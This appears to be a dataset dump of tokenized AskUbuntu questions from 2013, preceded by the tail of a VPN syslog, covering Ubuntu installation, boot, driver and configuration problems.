192.168.193.10 ] aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : local ip address 192.168.11.77 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : remote ip address 192.168.11.10 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : primary dns address 192.168.100.6 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : ccp terminated by peer ( no compression negotiated^ @ ) aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : compression disabled by peer . aug 2 12:36:26 fman-q1585m pppd [ 2948 ] : pppd 2.4.5 started by root , uid 0 aug 2 12:36:26 fman-q1585m pppd [ 2948 ] : using interface ppp1 aug 2 12:36:26 fman-q1585m pppd [ 2948 ] : connect : ppp1 < -- > /dev/pts/1 aug 2 12:36:26 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) aug 2 12:36:26 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) : no ifupdown configuration found . aug 2 12:36:26 fman-q1585m pptp [ 2950 ] : anon log [ main : pptp.c:314 ] : the synchronous pptp option is not activated aug 2 12:36:26 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' aug 2 12:36:26 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply aug 2 12:36:26 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . aug 2 12:36:27 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' aug 2 12:36:27 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . aug 2 12:36:27 fman-q1585m pptp [ 2958 ] : anon log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 31649 ) . aug 2 12:36:28 fman-q1585m pppd [ 2948 ] : chap authentication succeeded aug 2 12:36:28 fman-q1585m pppd [ 2948 ] : mppe 128-bit stateless compression enabled aug 2 12:36:29 fman-q1585m pppd [ 2948 ] : local ip address 176.102.250.111 aug 2 12:36:29 fman-q1585m pppd [ 2948 ] : remote ip address 176.102.224.55 aug 2 12:37:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:38:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:39:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:40:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:41:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:42:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:43:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:44:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:45:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:46:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:677 ] : echo reply received . aug 2 12:46:27 fman-q1585m pptp [ 2958 ] : anon log [ logecho : pptp_ctrl.c:679 ] : no more echo reply/request packets will be reported . aug 2 13:17:01 fman-q1585m cron [ 3498 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ pptp_handle_timer : pptp_ctrl.c:1050 ] : closing control connection due to missing echo reply aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ pptp_conn_close : pptp_ctrl.c:430 ] : closing pptp connection aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 3 'stop-control-connection-request' aug 2 13:18:15 fman-q1585m pptp [ 3392 ] : anon log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : modem hangup aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : connect time 24.0 minutes . aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : sent 909838891 bytes , received 12167 bytes . aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : mppe disabled aug 2 13:18:15 fman-q1585m pppd [ 3382 ] : connection terminated . aug 2 13:18:15 fman-q1585m avahi-daemon [ 861 ] : withdrawing workstation service for ppp1 . aug 2 13:18:15 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) aug 2 13:18:16 fman-q1585m pppd [ 3382 ] : exit .
327731	kernel panic not syncing out of memory and no killable processes	i have removed my old version of ubuntu & windows 7 by deleting the partitions using a bootable pen drive containing ubuntu-13.04 to install the new version.the moment i restarted the system to install ubuntu-13.04 , after selecting install ubuntu option , it started giving me the error `` kernel panic not syncing out of memory and no killable processes '' and then i tried many times to restart and do the process again , did memory test and it is a pass.i was unable to install windows too.till the moment i deleted these partitions it was good : ( .i am using dell xps laptop and the configuration is i5 , 4gb ram,1gb nvidia graphics with a 500gb hard disk . can we solve this error ? ? .thank you in advance
327747	how to remove sublime installed using the website instructions ?	i installed sublime following steps from this site . but i read on here that it is wrong way to install . now my question is how do i remove it .
327748	developing multi-touch supported apps	i have recently been using a large touch table to generate ubuntu touch events ( https : //www.kernel.org/doc/documentation/input/multi-touch-protocol.txt ) but have yet to find any software that supports these event 's besides kivy 's touchtracer . ( http : //kivy.org/docs/installation/installation.html ) . there are a few other apps around that claim to support the newish multitouch gestures in ubuntu that seems to be supported through utouch , mtdev and evdev however none of these have been able to pick up my touch events . some of the software i have tested that claims to support the ubuntu touch events are : qt example applications , empcommand , touchegg and probably a few more i have forgotten . even the ubuntu touch ( mobile phone ubuntu ) does n't support the touch events i am generating at the evdev level . my touch table is able to generate these evdev abs_mt_ events and inject them through uinput into the input subsystem . my question to the community is : how can i develop applications to support the multitouch events outlined in the multitouch protocol ? what sorts of frameworks are available to developers who wish to create multitouch applications in ubuntu ? lastly , i have n't been able to find much information in the past few months i 've spent researching this . is there a active community of developers working on bringing multi-touch support to applications in ubuntu ? where can i find more information ? cheers .
327753	installed ubuntu 13.04 . later format windows 7 from recovery partition	tried formatting windows 7 from recovery partition - it needs to reboot several times in this process . but after the first im now im stuck on '' error : no such partition . grub rescue '' worst yet : im on a netbook with no dvd/cd drive ! i created another bootable usb for ubuntu 13.04 with my wife 's computer and it still says the same as above . now i have no drivers installed ( thankfully the usb drive is found ) , and i cant load anything : ( im afraid ubuntu has ruined my recovery partition and now my wife is going smash my balls since her computer wont boot up now either ... it says `` operating system not found . '' so i had to write this on a damn iphone . anyways , hers wont be a problem bc of a bootable disk drive . is there any commands to enter on this ubuntu screen of death ? can i , and if so , how do i access the recovery partition ? ? or remove this boot to ubuntu bs that is ruining my life at the moment ? ! ? please help !
327755	error when starting wiican using chrubuntu	after installing wiican from here : http : //www.getdeb.net/install/wiican i ca n't get the wii remote to connect . when i start the program from the launcher and click on the icon in the top bar , it says `` please load input module first . '' when i run program from the terminal , it looks like this : ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient ( wiican:4577 ) : gconf-warning ** : have n't implemented getting a specific locale in gconfclient and i get the same `` please load input module first '' in the top bar icon . when i run the program from the terminal as sudo , i get the same gconf-warning errors and there is no icon present in the top bar . i am running chrubuntu which i believe is ubuntu 12.04 lts , on an acer c7 laptop . i have a usb bluetooth wireless receiver , and i 've been able to connect a wii remote using wmgui , which was displaying my button inputs . i 'm a total linux noob so i may have missed something really basic . please help !
327756	localhost index.php missing	when i updated php5 , i see the it works ! page appears when i go to http : //localhost instead of getting the localhost 's homepage . i see /var/www/index.php is missing . how should i correct it ? i have reinstalled php & apache but the problem remains .
327757	how to change screen resolution on my 10 year old compaq presario 2500	i installed ubuntu 12.04 on my old laptop as windows xp was simply crawling . ubuntu is a lot lot better..many thanks ! but my screen resolution/quality is not great . my display is rs200 ( radeon igp330m/340m/350m ) . is there a way for me to optimise my display ? i do n't know if the driver was updated while installing ubuntu or if it can . all advice are greatly appreciated . guna
327758	tortoisehg integration within nautilus3.6.3 in ubuntu 13.04	i installed ubuntu 13.04 ( with gnome nautilus 3.6.3 ) and tried to install tortoise workbench using these commands in he terminal sudo apt-get install mercurial tortoisehg tortoisehg-nautilus nautilus -q i can launch the tortoise workbench from the terminal using thg but i do not have the context menu when right-clicking on folder in nautilus i do not have icon overlay ( green or red discs on he folder ) following a suggestion made here i tried sudo add-apt-repository -y ppa : tortoisehg-ppa/releases sudo apt-get update sudo apt-get install mercurial tortoisehg without more success . has anyone got the context menu and the icon overlay working with ubuntu 13.04 ?
327766	trouble installing ubuntu 12.10 on asus windows 8 ultrabook	since ubuntu insists on only distributing the os with unity ( when i prefer gnome ) i decided that since the company i work for got us new laptops , i was going to install backtrack . however it turns out i had to install an old version of backtrack and then upgrade to a newer version , too much fiddling for my liking . eventually i decided to install ubuntu since i had the image for 12.10 in 64bit . my problem is that throughout the day yesterday i 've found that there are settings on he machine that had to be changed for me to install ubuntu on this asus ultrabook , but after turning off fast startup and the other 'fast ' setting in the bios , i still get only a black screen after selecting either running ubuntu from my live flash drive or selecting the install option . can somebody pleeeeease help me , windows 8 is worse than windows 7 and the last windows os i could bare with was xp , i can not run ubuntu in a vm ( virtualbox by oracle ) on windows 8 because of some of the restrictions microsoft put in windows since vista
327767	ubuntu server auto start irssi in proxy mode	on my home server i use irssi in proxy mode to keep track of irc . from any of my desktops i then just point xchat to my home server . what i want to be able to do is have irssi start in my user session on the server and start in proxy mode . i 've read everything i can find about this but had no joy running it , can anyone help please .
327773	ubuntu 12.04.1amd64bit tls installation problem	when i finish installing ubuntu 12.04.1amd 64bits tls alongside with windows 8 on my laptop it was not showing ubuntu at the start-up boot but it just boot to windows 8. how do i get the ubuntu i installed ?
327775	how do i remove black bars on top and bottom of my display ?	i have a problem with my ubuntu 12.04 lts . it shows my samsung electric company 17 '' strange . it is not centered . i have a black space up and right . the pictures will explain better my problem . http : //s15.postimg.org/ekxt6onbf/screenshot_from_2013_08_02_12_46_34.png this is what xrandr shows screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 8192 x 8192 vga1 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 60.0*+ 75.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis )
327777	installing proprietary nvidia driver on uefi-loaded ubuntu	i have installed ubuntu using a secure boot option on uefi . since then i have disabled secure boot , and now i want to install nvidia drivers . but the additional drivers section of the settings panel is still empty . how do i change that ?
327783	problem booting ( ubuntu/windows 8 )	here 's the problem ( suddenly appeared ) . i turn on my pc tries to boot ... the underscore blinks for some time , screen goes black and starts over again . goes on for some time and after a while i get : boot0 : gpt boot0 : gpt boot0 : error i 've only left it once to go up to there i usually restart . i tried inserting 13.04 live cd with no luck..same thing happens . after that i inserted a win 8 dvd which froze when the windows logo appeared ( i did n't wait for very long it could have been working , it was there for like a minute ) . restarted after a couple of times and grub loaded properly and now im on win 8 . also a couple of times the pc froze while on the gigabyte logo . extra info : windows 8 and ubuntu are installed on diff hard drives . i have a gigabyte 970a-ds motherboard and fx6300 amd cpu , saphire 7790 gfx ( i know this is useless info but why not : p ) . i hope it 's not the motherboard ... . any ideas ? : /
327786	how to dual boot ubuntu with windows 7 without losing my files ?	i downloaded the ubuntu-13.04-desktop-i386.iso ( 794.00mo ) file and burned it into a dvd of 4.7gb with a very low speed of burning . anyway the os was bootable when i put the dvd the ubuntu installer appears it asks to choose language , try ubuntu and install ubuntu.i chose install ubuntu . an os detection and formatting disc step appears and it gives me options , install ubuntu with windows 7 , replace windows by ubuntu ..etc.i choose install ubuntu with windows 7 and a partition appears ; i do n't really understand how to proceed ? i have a hard disc partitioned to 2 parts c : \ and d : \ . c : \ size is 39.0 gb the d : \ is 35.4 gb the free space on c : \ is 22gb/39gb i have important files on d : \ drive . please how do i install ubuntu 13.04 with windows 7 without loosing d : \ files and without loosing windows 7 my windows is : windows 7 ultimate 32 bit fr thank you very much for your help
327794	how to remove taskbar from ubuntu ?	as image itself explain my question . i am new to ubuntu . i have installed ubuntu tweak and now i want to remove that bar . i have already removed global menu from ubuntu . i do n't have enough reputation to post image please follow the link below .
327799	no wireless in sony vaio laptop	i have a sony vaio laptop with ubuntu installed . how can i turn my wireless on ? in windows i can use fn+f5 keys .
327801	dropbox 1.6 configuration	i 'm working with ubuntu 12.04 and i installed dropbox 1.6.0 . after installation , it working . the dropbox icon is in the notification area and i can configure it . the most important for me is to configure a proxy with username and password authentication . but ... after a while ( i do n't know exactly because it is a server and i do n't connect to it every day ) the icon dispears . even the synch continue working . and now i have to change the proxy password . so how can i do if i do n't have the dropbox icon ?
327803	is my laptop compatible for a dual boot ?	i have an asus laptop , windows 8 is the current os . i am trying to install ubuntu as a dual boot , so far i have tried downloading it from the ubuntu website however a message error showed when i tried to reboot and now ca n't replicate this message , it said the file contained some sort of error . next i tried to boot from usb , i do n't have a cd drive so cd is n't an option . no luck with the usb it did n't recognize the files . is there a possibility that my laptop is n't compatible with ubuntu ? thanks .
327807	any 3d cad programs for ubuntu ?	i need a good cad program for mechanical engineering . are there any good 3d cad programs available for ubuntu like autocad ?
327808	bluetooth not working properly on ubuntu	when i turn on my bluetooth in ubuntu 12.04 it does not show any options for discovering devices or any bluetooth functions . what should i do to show these options ? as you can see even though bluetooth is turn on ( in status bar ) no options are shown .
327811	problems in net connectivity	i have installed both ubuntu raring ringtail and windows7 in my computer ( dual-boot ) . while all the sites can be visited using windows , some sites like yahoo ! ca n't be accessed using ubuntu . i ca n't understand how to solve this problem . please help me out .
327815	grub : “invalid arch independent elf magic” - usr/sbin/grub-bios-setup : not found	i just got over with installing ubuntu 13.04 on my asus laptop from a usb stick . after the installation finished and the computer restarted , it started up with a grub : invalid arch independent elf magic error . i looked around on google to find out a solution and found cadoc 's thread grub : “invalid arch independent elf magic” after 11.10 install on macbook pro 5,5 and followed the solution up to the line sudo grub-install -- root-directory=/mnt /dev/sda when i typed that command , i got /usr/sbin/grub-bios-setup : not found . and i could n't find any solution for that after some searching on google . so what do i have to do to fix that and get thing going fine ?
327817	my free app showing 'buy ' ?	my app in the software centre showing 'buy ' with 0.0 usd but i published it as free . i am a new ubuntu developer.what are the files that i have to upload to software centre for publishing ?
327825	long pause in pxe/preseed install	i 'm encountering a long pause during unattended ( preseeded ) install of precise server via pxe . the install eventually works , but appears to just sit there for 20 or 30 minutes after it authenticates the mirror . there is nothing in the logs during this time , even with full debug . log excerpt : aug 2 13:29:59 net-retriever : signature made fri aug 2 06:05:28 2013 utc using dsa key id 437d05b5 aug 2 13:29:59 net-retriever : gpgv : aug 2 13:29:59 net-retriever : good signature from `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' aug 2 13:29:59 net-retriever : aug 2 13:50:10 anna [ 5072 ] : debug : resolver ( ext2-modules ) : package does n't exist ( ignored ) aug 2 13:50:10 anna [ 5072 ] : debug : resolver ( efi-modules ) : package does n't exist ( ignored ) bug related to this problem that is not being worked . i 'm surprised that no one else is complaining about this . or , is there some other way to do an unattended install that everyone else is using ?
327827	installation can not be complete	this is the first time , i am trying to install ubuntu . i download the ubuntu 12.04 64 bit image . i am trying to install from win 7 . i follow the steps which described at http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows after the step 5 , installation screen 6 does n't appear which is completing the ubuntu setup . after step 5 , installation closing itself without any warning .
327829	recently freed hard drive space is not being recognized	i 've got an ubuntu 12.04.2 server whose root partition filled up . i discovered that the /var/log/auth.log file had grown to around 3.8gb . after compressing this file using gzip , the file size was around 110mb . running the df -h command , the root partition 's disk usage is still at 100 % . i 'm assuming a reboot will correct this , but since it 's a production server , i was wondering if there was a way to convince this server that it actually has much more free space than it thinks . thanks in advance for the help and advice . edit : lesson learned : lsof is your friend ! after running lsof and grepping for auth.log , i was able to determine that another process was using auth.log . after restarting that process , the free space was recognized by the server .
327830	text document shows random characters	i had a text document notepad file in my windows7 with some text written in it then i wrote some more text in ubuntu in that file but now it seems that i have lost all the texts since it shows random characters mostly like /00/00/00/ do you have any idea how i can recover my information again ? tnx
327832	ubuntu touch os	does anyone know if the ubuntu touch os will be downloadable for any phone ? i 'll be getting a new phone today and was wondering if i should just get a cheap brick to get my by or if i should get a decent one ( htc one , galaxy s4 , experia z , etc ) and then just download ubuntu touch os onto it once the stable version is released . i remember reading somewhere that developers would be making compatible versions for different kinds of phones , i do n't care if i have to pay for it or not , i just want to know if it 'll be available .
327835	how do i install windows 8 alongside ubuntu 12.04	i have seen a many questions about installing ubuntu 12.04 alongside windows 8 . i , however , will be installing ubuntu 12.04 this weekend and plan on buying windows 8 sometime in the next few months . i would like to know if i can install ubuntu 12.04 now , and install windows 8 later without any problems . every time i see how to install both , it is assumed windows 8 is installed first . thank you
327837	getting a deb with wget problem	i 'm trying to get anki like this : wgetâ https : //anki.googlecode.com/files/anki-2.0.12.deb ( that 's the latest version ) gives me : zsh : no such file or directory : wgetâ https : //anki.googlecode.com/files/anki-2.0.12.deb i 'm writing an install script for my system , the same worked with skype and googlechrome , not sure what 's the problem ?
327842	my app is showing twice in the software centre ?	i have published an application in the software center by uploading dsc and tar.gz in an archive . in the software center it is showing twice one with my application icon and one with default icon . how to solve this ?
327843	how to create a init.d script for openssh-server which was compiled and installed from source using configure + make + make install ?	i have installed openssh-server in my ubuntu pc using apt-get install openssh-server . the version is 5.9 . now , i would like to compile and install openssh-server version 6.2 from source codes . i have successfully downloaded the source codes , and run the following commands : ./configure make make install i found that the new version of openssh-server was installed into /usr/local/sbin/ . the old version of openssh-server was in /usr/sbin/ . i found that the service script in /etc/init.d/ssh is still pointing to /usr/sbin/ . and the old openssh-server ( v5.9 ) is still running . how can i replace the old openssh-server with the new openssh-server that i have just compiled and installed ? how can i create a init.d script to start and stop the new openssh-server that i 've compiled from source ? how to start the new openssh-server on boot ? when i install openssh-server using apt-get install , the config files will be installed into /etc/ssh/ . if i compile and install it from source , where is the config file ? thanks .
327845	qt linguist phrasebook from .ts file	i 'm working on a translation with qt linguist . several words have multiple entries so i would like to reuse the words already translated to `` batch translate '' the rest of the files . batch translation is only possible with a phrasebook . is there a way to automatically put all the words of a .ts file into a phrasebook ?
327846	error while installind tp-link `` rt-wn723n '' driver	hello i am trying to install the tp-link `` rt-wn723n '' driver but i get this error : make : *** /lib/modules/3.8.0-27-generic/build : no such file or directory . stop . make : *** [ modules ] error 2 please how to solve it i am using ubuntu 13.04 64x
327851	installed unstable graphic driver and it crashed , how to restore normal graphics driver ?	it is a 64 bit ubuntu 12.04 2 lts , with nvidia graphic card . i tried installing driver from : http : //www.nvidia.com/object/unix.html as the system is connected to network and lot of the system are mounted in local system . installation is struck at `` searching for conflicting x files '' as it is trying to scan a very big network . is there a way to install it using apt-get or avoid `` searching for conflicting x files '' step ? i 'm not sure what more details are required , please comment if you need more details to fix this , thanks in advance
327859	how to make ubuntu 12.04 desktop session start on boot without a monitor plugged in ?	i have a home server that i need to access via remote desktop , and i want to leave the server there without a monitor hooked up to it . everyday the server turns off and turns back on . there is no monitor installed . i find that my 12.04 64 bit installation , when booted without the monitor plugged in , just hangs on a screen that says the system will start in low-resolution mode . it never actually starts up the desktop environment , which is what i need . so it is impossible for me to remote desktop to the server after it is started . this is the problem . when i reboot with a monitor installed , the desktop session starts and everything is fine . is there a way i can configure the system to run the desktop session after every boot without a monitor installed ? i have looked around the net quite a bit . this question mentions that the desired behavior worked in 12.04 , but i do not have this experience . any help is greatly appreciated !
327863	`` failed to create swap space '' error during installation	i 've been trying to install ubuntu for the past two days or so , but i 've been running into a problem : every time i run the installation program on the livecd , i always get the same ( or a very similar ) error : '' failed to create swap space the creation of swap space in partition # 3 of scsi5 ( 0,0,0 ) ( sda ) failed . '' so far , i 've run dban ( darik 's boot and nuke ) on my hdd once , to make absolutely sure that everything on it had been erased . then , i simply put in the livecd , and let it run the automated install . i get the above error directly after i tell it to automatically partition the hdd ( it will work for a second or so , then this will pop up ) , forcing me back to the screen that lets me choose whether i want to automatically or manually partition the hdd . well , after failing to install the software manually , i did a little research and learned enough about partitioning linux to use the 'manual partitioning ' option . i partitioned the hdd as follows ( it 's a 1tb drive ) : /home - ( the rest ) - ext2 , / - 20gb - ext2 , /boot - 100mb - ext2 , /swap - 8gb /efiboot - 40mb the only difference when i tried this method was that i got this message : '' failed to create swap space the creation of swap space in partition # 2 of scsi5 ( 0,0,0 ) ( sda ) failed . '' basically , the only difference was that there was now a '2 ' instead of a '3 ' . if i may ask , what exactly am i doing wrong ? i 've tried looking around the internet ( that 's basically all i 've done for the last two days ) , but no one seems to have the same problem that i have , and i 've tried most of the solutions for similar problems ( dban , formatting partitions in ext2 format , etc ) . the only thing i have n't tried is using the terminal to manually partition the hdd ... and i actually did try to do this , but i was n't able to get past 'su ' 's password demand , so i was n't able to use the terminal . thank you for your help in advance . ~welsh update~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ alrighty , i just went and did a little more testing , and here 's what i found ( thanks to your advice , cuban ... and user , i made the appropriate modifications to my data portions ) : when i tried using the manual installer again , this time i only created /boot , / ( root ) , and /home partitions . when the efi window popped up , i continued , and when the `` you do n't have swap '' window popped up , i continued . just like before , after about two seconds a window popped up , but it had a different error this time : '' failed to create a file system the ext4 file system creation in partition # 1 of scsi5 ( 0,0,0 ) ( sda ) failed . '' at this point , i 'm pretty sure the installer is just not going to work . partition # 1 , in this case , was the /boot partition . after i did that , i went and learned how to use fdisk , and succeeded in creating an 8gb linux swap / solaris partition in slot # 1 ( was that the correct way to create swap ? it was hexcode 82 ) . at any rate , do you know what the file types are for /home , / ( root ) , and /boot ? if so , i can probably just completely format the hd before running the installer , since it 's not doing so well at the partitioning part . once i get it formatted manually , would i just go into the 'manual installation ' part of the installer and 'continue ' without creating any partitions ? edit : actually , i just went back into 'sudo fdisk /dev/sda ' , and then typed 'p ' ... and i saw a blank table of partitions , with no sign of the partition i had just created . is that supposed to happen ? thanks again for your help . thanks to you i 'm finally starting to enjoy linux ( even though i have n't even actually installed it yet ) . ~welsh update~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ i looked through a few other tutorials , and tried running and using gparted to partition my hdd . well , when i went under 'device ' and 'created a new table ' , i got an error in the console : `` /dev/sda : unrecognised disk label '' . maybe my hdd just ca n't be partitioned ?
327865	deploying openstack on 6 servers	i 'm new to openstack and i 'm still learning . in 2 month i 'll get 6 servers like : 4 servers with dual xeon e5-2630 , 96gb ram , 2 1gb ethernet and 2 500gb hdd in raid 1 das with 40tb of storage ( 10x4tb hdd ) 1 server with single xeon e5-2630 with 16-32 gb of ram . i has a few questions for this setup and with openstack in general : i practically has 3 dedicated compute nodes , 1 compute+storage node ( 1 server+das ) and 1 node/network controller . as i read the best practice for networking server is to have this service run on all nodes for redundancy as opposed to running on a single controller where is it fails then all the ecosystem fails too.what is your oppinion ? another thing is the colocation of services as i do n't have the necessary number of hardware to deploy every service on it 's private hardware . i was thinking that the controller should run the controlling part service of nova , the object storage server and block storage server and the compute+storage server should run nova+object storage+block storage . what do you think of this setup ? for the das should i use raid or not because i read somewhere that swift and opesntack in general does n't get along very well with raid ? should i use openstack-networking or the newer quantum ? i 'll use this servers for hosting , storage like dropbox and virtualization . except the latter , the first 2 will run in vms . the thing is that i do n't understand how openstack works with available resources . does it make a pool of the available ram , cpu , storage etc ? the das will be connected to only 1 server . reading and writing to disk uses ram memory for cache etc ; my question is : will openstack fill the ram proportionaly on all nodes when reading or writing or will it use only the ram from where das is attached to ? this is an important problem for me . also , only having one machine with actual storage capability will it help adding 2 more 1gb ethernet to cope with intense requests on the storage server ? or should i distribute the hdd 's to all servers and install the storage services on them ? i did n't find a good tutorial on how to deploy openstack using maas and juju , because it seems to be an easier setup then manual install . how does openstack get along with amd opteron 6300 series ? i 'm asking this because there is a possibility that i could change from intel to amd , the latter being much cheaper so i can get for the same ammount of money twice and something the number of cores ( e5-2630 being a 6 core with ht , and from what i understand i should disable ht ) to be continued when i will be confronted by other problems . thank you for your help !
327866	comcast xfinity tv videos will not launch	just installed ubuntu 12.04 lts on my old xp desktop . now xfinity tv will not launch videos . i get the ads , the tv rating , but the video will not launch . recieving no error messages , just hangs on the ad or the rating page . any ideas anybody ?
327869	how to send current of line of code to terminal input in gedit 2013 ?	i just switched to ubuntu . i want to use r and i am using gedit to write r script . when i was using mac , i was able to use run a r script line by line . however , i have no idea how to do this now in gedit . i notice someone said it was impossible to do so how can i send current line in gedit to terminal ? , but that was 2 years ago . and recently , i saw people doing it on youtube . http : //www.youtube.com/watch ? v=4jjdkces5yw
327870	microsoft wedge touch mouse not working	i 'm having trouble getting my microsoft wedge touch mouse to work properly . i 've followed the suggestion in the bug report below and added the following to /usr/share/gnome-bluetooth/pin-code-database.xml < ! -- microsoft wedge mouse -- > < device oui= '' 7c:1e:52 : '' type= '' mouse '' pin= '' 0000 '' / > https : //bugs.launchpad.net/ubuntu/+source/bluez/+bug/1158462 the mouse pairs but does not work and the connection flicks on and off . any help would be greatly appreciated !
327873	ubuntu default problem	i am currently in a very difficult problem right now please please help me out . i wanted to add the `` knotes '' as the default startup app in my ubuntu 12.04 so i added it in startup application menu , while adding i saw other apps which i thought were not useful so i removed those apps ( this seems to be a very big mistake ) and now i am unable to change the wallpaper ( i tried every possible option ) , ubuntu keeps asking me about 12.10 upgrade even if i say `` do n't upgrade '' and the worst problem is my keyboard layout is automatically selected to `` english ( uk ) '' which i am unable to change because whatever layout i select it gets automatically changed to `` english ( uk ) '' .i ca n't even type a single sentence properly ( coz all keys are changed ) . i am in very serious trouble right now as i can not reinstall whole ubuntu now please please help me guys ! output of : ls /etc/xdg/autostart at-spi-dbus-bus.desktop bluetooth-applet.desktop bluetooth-applet-unity.desktop deja-dup-monitor.desktop gdu-notification-daemon.desktop gnome-fallback-mount-helper.desktop gnome-keyring-gpg.desktop gnome-keyring-pkcs11.desktop gnome-keyring-secrets.desktop gnome-keyring-ssh.desktop gnome-screensaver.desktop gnome-settings-daemon.desktop gnome-sound-applet.desktop gnome-user-share.desktop gsettings-data-convert.desktop gwibber.desktop jockey-gtk.desktop jockey-kde.desktop nautilus-autostart.desktop nm-applet.desktop onboard-autostart.desktop orca-autostart.desktop polkit-gnome-authentication-agent-1.desktop print-applet.desktop pulseaudio.desktop pulseaudio-kde.desktop synaptiks_init_config.desktop telepathy-indicator.desktop ubuntuone-launch.desktop update-notifier.desktop user-dirs-update-gtk.desktop vino-server.desktop zeitgeist-datahub.desktop
327877	how to verify a gpg signed file	i was trying to install the newest version of libpcap ( as the version in the repositories does n't seem current ) and ran into the following problem . i copied the tcpdump-workers.asc text from the tcpdump website ( which hosts libpcap as well ) and imported the key to my keyring using gpg -- import tcpdump-workers.asc that when all well and fine but when i tried to verify the libpcap-1.4.0.tar.gz file against the key with gpg -- verify , i ended up getting the message that unexpected data . was found . i am wondering if anyone else has run into this problem as the ancient technique of googling my problem has done little to answer my question .
327878	window 8 option is not getting shown in grub	i recently installed fedora 19 on my laptop replacing ubuntu which was already running dual boot with windows . after the installation of fedora on the boot screen there were only two options without any windows 8 boot option . i tried re-installing the ubuntu , but the result is still the same , windows 8 is not getting shown on the grub menu . i have also tried boot-repair but still there is no luck . help ! !
